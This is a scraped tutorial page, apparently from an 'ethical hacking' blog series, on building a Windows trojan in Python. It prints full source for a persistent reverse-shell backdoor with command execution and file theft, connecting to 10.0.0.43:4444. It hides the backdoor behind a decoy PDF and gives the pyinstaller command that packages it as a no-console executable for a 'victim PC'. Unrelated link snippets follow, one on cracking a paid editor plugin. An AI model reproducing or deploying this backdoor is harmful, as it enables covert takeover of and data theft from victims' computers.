DOWNLOAD & EXECUTE PAYLOAD

  • A generic executable that downloads & executes files.
  • Disadvantages:
    • User needs internet connection.
    • Files have to be uploaded and accessible via a direct URL.

PACKAGING - CREATING TROJANS

  • Package front file with evil file.
  • Extract front file at run time.
  • Run front file from evil code.

Prepare a PDF file - sample.pdf on the Download folder.

Polish the Python Code:

#!/usr/bin/env python
import json
import socket
import subprocess
import os
import base64
import sys
import shutil class Backdoor:
def __init__(self, ip, port):
self.become_persistent()
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port)) def become_persistent(self):
evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
if not os.path.exists(evil_file_location):
shutil.copyfile(sys.executable, evil_file_location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True) def reliable_send(self, data):
json_data = json.dumps(data).encode()
self.connection.send(json_data) def reliable_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024).decode()
return json.loads(json_data)
except ValueError:
continue def change_working_directory_to(self, path):
os.chdir(path)
return "[+] Changing working directory to " + path def execute_system_command(self, command):
DEVNULL = open(os.devnull, "wb")
return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL) def read_file(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read()) def write_file(self, path, content):
with open(path, "wb") as file:
file.write(base64.b64decode(content))
return "[+] Upload successful." def run(self):
while True:
command = self.reliable_receive() try:
if command[0] == "exit":
self.connection.close()
sys.exit()
elif command[0] == "cd" and len(command) > 1:
command_result = self.change_working_directory_to(command[1])
elif command[0] == "upload":
command_result = self.write_file(command[1], command[2])
elif command[0] == "download":
command_result = self.read_file(command[1]).decode()
else:
command_result = self.execute_system_command(command).decode()
except Exception:
command_result = "[-] Error during command execution." self.reliable_send(command_result) file_name = sys._MEIPASS + "\sample.pdf"
subprocess.Popen(file_name, shell=True) try:
my_backdoor = Backdoor("10.0.0.43", 4444)
my_backdoor.run()
except Exception:
sys.exit()

Convert the Python Program to Windows executable. - Add the "--add-data" argument this time.

wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-/Scripts/pyinstaller.exe --add-data "/root/Downloads/sample.pdf;." --onefile --noconsole reverse_backdoor.py

Run the lister on Kali Linux, and run the reverse_backdoor.exe file on the victim PC. The user can only see a normal pdf file, but the communication has been established background.

Python Ethical Hacking - TROJANS Analysis(2)的更多相关文章

  1. Python Ethical Hacking - TROJANS Analysis(1)

    TROJANS A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc). When e ...

  2. Python Ethical Hacking - TROJANS Analysis(4)

    Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Conver ...

  3. Python Ethical Hacking - TROJANS Analysis(5)

    Spoofing File Extention - A trick. Use the Kali Linux Program - Characters 1. Open the program. 2. F ...

  4. Python Ethical Hacking - TROJANS Analysis(3)

    BYPASSING ANTI-VIRUS PROGRAMS AV programs detect viruses based on: 1. Code - compare files to huge d ...

  5. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  6. Python Ethical Hacking - Malware Analysis(4)

    DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...

  7. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  8. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  9. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

随机推荐

  1. Mac App破解之路九 vscode插件破解

    破解对象: luaide 破解目的:学习如何破解vscode插件 破解背景: vsscode用了这么多年,安装了很多插件,其中luaide插件是收费的.  说实话,100块并不贵, 我本来准备买的. ...

  2. web api(基于NFine框架) 中接口跳转数据格式错误解决方案

    using NFine.Code; using NFine.Domain; using System.Web.Http; using Newtonsoft.Json; namespace Api.Co ...

  3. 基于web网站项目的性能测试结果分析

    业务背景: 最近公司研发了一款对并发要求比较高的web项目,需要对其压力测试,模拟线上可能存在的问题,这个过程中遇到一些很多问题,这里重新梳理一下思路,希望能给遇到同样问题的小伙伴提供一个参考. 工具 ...

  4. 【K8s学习笔记】K8s是如何部署应用的?

    本文内容 本文致力于介绍K8s一些基础概念与串联部署应用的主体流程,使用Minikube实操 基础架构概念回顾 温故而知新,上一节[K8S学习笔记]初识K8S 及架构组件 我们学习了K8s的发展历史. ...

  5. vue学习第二天:Vue跑马灯效果制作

    分析: 1. 给开始按钮绑定一个点击事件 2.在按钮的事件处理函数中,写相关的业务代码 3.拿到msg字符串 4.调用字符串的substring来进行字符串的截取操作 5.重新赋值利用vm实例的特性来 ...

  6. linux网络编程-socket(1)

    上面是对应的IpV4的地址结构: sin_len整个结构的大小 sin_family协议族,对应Tcp固定为AF_INET,除了tcp协议外还支持unix域协议等 sin_port socket通信的 ...

  7. Centos7 GRE Tunnel

    一.关闭防火墙及selinux 二.CentOS7默认不加载gre内核模块,加载gre内核模块 # modprobe ip_gre   临时加载gre模块(重启后失效) # lsmod |grep g ...

  8. npm安装加速

    1.通过config命令 npm config set registry https://registry.npm.taobao.org npm info underscore (如果上面配置正确这个 ...

  9. 《Java核心技术(卷1)》笔记:第8章 泛型程序设计

    (P 327)"菱形"语法: ArrayList<String> files = new ArrayList<>(); // Java 9 扩展了菱形语法的 ...

  10. EntityFramework Core 迁移忽略主外键关系

    前言 本文来源于一位公众号童鞋私信我的问题,在我若加思索后给出了其中一种方案,在此之前我也思考过这个问题,借此机会我稍微看了下,目前能够想到的也只是本文所述方案. 为何要忽略主外键关系 我们不仅疑惑为 ...